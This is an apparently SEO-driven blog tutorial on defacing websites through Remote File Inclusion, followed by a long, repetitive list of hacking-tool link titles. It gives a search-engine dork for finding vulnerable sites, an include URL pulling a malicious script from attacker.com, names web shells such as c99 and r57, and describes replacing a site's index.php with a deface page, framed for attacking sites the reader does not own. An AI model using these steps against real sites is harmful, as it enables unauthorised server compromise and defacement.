HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related articles


  1. Hack Tools For Games
  2. Hacking Tools
  3. Pentest Tools Linux
  4. New Hacker Tools
  5. Computer Hacker
  6. Usb Pentest Tools
  7. Bluetooth Hacking Tools Kali
  8. Pentest Tools Alternative
  9. Hacking Tools Hardware
  10. Hacking Tools Software
  11. Tools Used For Hacking
  12. Hacker Tools Mac
  13. Pentest Tools Port Scanner
  14. Hacking Apps
  15. Best Pentesting Tools 2018
  16. Hacking Tools Hardware
  17. Hacker Techniques Tools And Incident Handling
  18. Top Pentest Tools
  19. Hacking Tools For Mac
  20. Hacker Tools List
  21. Hacking Tools For Games
  22. Hacker Search Tools
  23. Hack Rom Tools
  24. Hack And Tools
  25. Hacking Tools Free Download
  26. What Are Hacking Tools
  27. Easy Hack Tools
  28. How To Install Pentest Tools In Ubuntu
  29. How To Install Pentest Tools In Ubuntu
  30. Hacking Tools And Software
  31. Pentest Tools For Mac
  32. Pentest Tools Website Vulnerability
  33. Tools 4 Hack
  34. Hacking Tools Software
  35. Pentest Tools Framework
  36. Pentest Tools Website
  37. Hacking App
  38. Hacker Tools 2019
  39. Hacking Tools For Windows Free Download
  40. Pentest Tools Free
  41. Hacker Tools Software
  42. Hacking Tools Kit
  43. Hacking Tools Github
  44. Pentest Automation Tools
  45. Pentest Tools Linux
  46. Pentest Tools Github
  47. Ethical Hacker Tools
  48. Black Hat Hacker Tools
  49. Tools For Hacker
  50. Game Hacking
  51. Hackrf Tools
  52. How To Make Hacking Tools
  53. Hak5 Tools
  54. Hacking Tools For Kali Linux
  55. Hacker Security Tools
  56. Hacker Search Tools
  57. Hacking Tools Software
  58. Hack Rom Tools
  59. Hacker Tools For Pc
  60. Hacker Tools List
  61. Hack Tools
  62. Hack Tools For Games
  63. Hackers Toolbox
  64. How To Install Pentest Tools In Ubuntu
  65. Best Pentesting Tools 2018
  66. Computer Hacker
  67. Hacking Tools Usb
  68. What Are Hacking Tools
  69. Tools For Hacker
  70. Hak5 Tools
  71. Hackers Toolbox
  72. Hack Tools Download
  73. Hack Tools For Games
  74. Pentest Tools Tcp Port Scanner
  75. Hacking Tools Windows 10
  76. Pentest Tools Open Source
  77. New Hacker Tools
  78. Hack Tools Mac
  79. Termux Hacking Tools 2019
  80. Pentest Tools Linux
  81. Hack Tools Download
  82. Hacking App
  83. Hak5 Tools
  84. Bluetooth Hacking Tools Kali
  85. Best Pentesting Tools 2018
  86. Hacking Tools For Pc
  87. Hacking Tools Download
  88. Hacker Hardware Tools
  89. Pentest Reporting Tools
  90. Hack Tools For Games
  91. Pentest Tools Website
  92. Hacker Tools 2020
  93. Hack Tools For Ubuntu
  94. Hacker Tools Linux

0 comments:

Post a Comment

Request Item or Service

Powered by Blogger.